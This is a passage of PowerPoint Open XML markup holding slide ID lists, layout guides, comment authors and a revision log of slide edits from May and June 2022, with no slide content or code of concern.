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7" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId24"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId25"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="270" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="266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2" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6797675" cy="9928225"/>
  <p:custDataLst>
    <p:tags r:id="rId26"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="de-DE"/>
    </a:defPPr>
    <a:lvl1pPr marL="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962">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="666" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="282" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="2867" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="3053" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="282">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="464">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="4536" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="5135" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" pos="53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a Drimmel" initials="CD" lastIdx="40" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Christina Drimmel" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Christina Drimmel" initials="NN" lastIdx="21" clrIdx="1"/>
  <p:cmAuthor id="3" name="Nina Bacher" initials="NB" lastIdx="1" clrIdx="2">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Nina Bach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14DF80-7BE6-4890-997F-4B49255B7646}" v="15" dt="2022-06-09T12:45:54.4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6940" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="145" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="660" y="114"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1620"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="962"/>
        <p:guide orient="horz" pos="666"/>
        <p:guide orient="horz" pos="282"/>
        <p:guide orient="horz" pos="2867"/>
        <p:guide orient="horz" pos="3053"/>
        <p:guide pos="282"/>
        <p:guide pos="464"/>
        <p:guide pos="4536"/>
        <p:guide pos="5135"/>
        <p:guide pos="530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7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 Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}"/>
    <pc:docChg chg="custSel addSld delSld modSld">
      <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:05:18.413" v="1138" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:45:04.391" v="161" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="907122302" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:45:04.391" v="161" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="907122302" sldId="256"/>
            <ac:spMk id="4" creationId="{50AB73C6-E4DA-4C92-85E8-C883E8D8A491}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:41:56.567" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2159326835" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:05:18.413" v="1138" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3745593683" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:42:12.076" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3745593683" sldId="258"/>
            <ac:spMk id="2" creationId="{CB7AD84A-C9AF-4864-8504-4E987B01D72F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:05:18.413" v="1138" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3745593683" sldId="258"/>
            <ac:spMk id="3" creationId="{9A84B5E9-1F5D-46CA-ADE1-1F631EE09120}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:44:47.936" v="149" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1307100808" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:00:29.430" v="520" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3094232885" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:00:29.430" v="520" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2341803154" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:02:16.944" v="765" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1556618350" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:00:45.346" v="553" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1556618350" sldId="262"/>
            <ac:spMk id="2" creationId="{00387512-4B86-4BA1-B639-8EDA8EF0A7A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:02:16.944" v="765" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1556618350" sldId="262"/>
            <ac:spMk id="6" creationId="{4B75EA5F-ADCB-4229-AEF9-904833580939}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:41:56.567" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1191498197" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:41:56.567" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3170738653" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:00:31.251" v="521" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2187819801" sldId="268"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:59:33.469" v="519" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2212217193" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:57:22.565" v="497"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2212217193" sldId="269"/>
            <ac:spMk id="2" creationId="{F398F096-5DED-4D45-979C-CF0D04BB920B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:59:05.397" v="512"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2212217193" sldId="269"/>
            <ac:spMk id="3" creationId="{B9531508-35A7-46D0-93F5-72FDB314CAAE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:59:07.156" v="513" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2212217193" sldId="269"/>
            <ac:spMk id="7" creationId="{23A55D8A-E999-4852-82A6-2A2D91E06A35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:59:11.459" v="516" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2212217193" sldId="269"/>
            <ac:spMk id="8" creationId="{D0A7C6F5-09E6-41FB-9B95-31B23AA47AB0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T10:59:33.469" v="519" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2212217193" sldId="269"/>
            <ac:picMk id="10" creationId="{B4131624-4E4E-45EE-8DB7-6398DD3CC848}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:03:24.865" v="924" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1768449482" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:02:46.138" v="790" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1768449482" sldId="270"/>
            <ac:spMk id="2" creationId="{00387512-4B86-4BA1-B639-8EDA8EF0A7A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:03:24.865" v="924" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1768449482" sldId="270"/>
            <ac:spMk id="6" creationId="{4B75EA5F-ADCB-4229-AEF9-904833580939}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:04:47.137" v="1127" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1891005196" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:04:00.428" v="941" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891005196" sldId="271"/>
            <ac:spMk id="2" creationId="{00387512-4B86-4BA1-B639-8EDA8EF0A7A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{035D4E9B-5B82-4672-B6F6-3E85B078114E}" dt="2022-05-29T11:04:47.137" v="1127" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891005196" sldId="271"/>
            <ac:spMk id="6" creationId="{4B75EA5F-ADCB-4229-AEF9-904833580939}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-10T12:09:12.754" v="4019" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:00.993" v="34" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3226669251" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:47.073" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="2" creationId="{5F7C1591-4ED6-A417-5CAC-57AD884291A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:47.073" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="3" creationId="{4855D2D1-D487-A357-BEB2-3704AEC5362C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:47.073" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="4" creationId="{C5568390-E1F8-0F0F-7BE7-DB92D5796A67}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:47.073" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="5" creationId="{B11F8752-E22F-A636-3CE5-CBC70845BB88}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:47.073" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="6" creationId="{C0E6B952-017C-EC35-B58D-F1934BC40E71}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:57:57.742" v="33" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="7" creationId="{19C9CB14-E9DC-C1BF-B4F2-F1AA341617A4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:00.993" v="34" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3226669251" sldId="272"/>
            <ac:spMk id="8" creationId="{A9EA2B9C-5B42-6DE1-729B-7C98C6AF0939}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:49:32.212" v="4017" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2063978433" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:13.410" v="36" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="2" creationId="{1C6D2E3D-CD8C-DEF9-B37D-5492A48CCA60}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:13.410" v="36" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="3" creationId="{8C0CC2B2-FBCE-8533-B528-47D2D1BBB127}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:13.410" v="36" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="4" creationId="{EA2D8990-3074-5F0B-FC4F-77EF2EA7EB80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:13.410" v="36" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="5" creationId="{09B6A4D0-BF2B-9345-826D-AA44B2D3E5A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:13.410" v="36" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="6" creationId="{6EE97E14-9518-AEE9-8C9E-DC2A0A168B73}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T11:58:19.274" v="37"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="7" creationId="{3D6C4D0C-4A25-439B-F25B-3B847ADF3583}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:49:32.212" v="4017" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:spMk id="8" creationId="{8B861531-0EB3-01E6-6D6B-48156D4F840D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:05:24.660" v="190" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063978433" sldId="273"/>
            <ac:picMk id="10" creationId="{12AC8B86-261D-CE19-4740-74F8130C2DCB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-10T12:09:12.754" v="4019" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1701448019" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:07:20.320" v="382"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701448019" sldId="274"/>
            <ac:spMk id="2" creationId="{BD15C7C2-5243-B656-6B44-D92498B98472}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-10T12:09:12.754" v="4019" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701448019" sldId="274"/>
            <ac:spMk id="6" creationId="{4B757EBB-31B2-25DB-DC4C-3E4C71F2FCC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:09:50.248" v="630" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701448019" sldId="274"/>
            <ac:picMk id="8" creationId="{5EDAF9C4-C48F-BFC5-DD78-636E75F8DC7C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:10:38.062" v="635" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1701448019" sldId="274"/>
            <ac:picMk id="10" creationId="{8EF8DEF5-3676-6117-2E96-8C2300C448A2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:17:41.338" v="1488" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2818310568" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:11:25.036" v="748" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818310568" sldId="275"/>
            <ac:spMk id="6" creationId="{4B757EBB-31B2-25DB-DC4C-3E4C71F2FCC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Georg Schäfer" userId="7e124e77-37b6-400a-8309-de03e74da690" providerId="ADAL" clId="{C614DF80-7BE6-4890-997F-4B49255B7646}" dt="2022-06-09T12:17:41.338" v="1488" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818310568" sldId="275"/>
            <ac:spMk id="8" creationId="{A07A30D1-85F3-9855-3EA3-2B3998796272}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
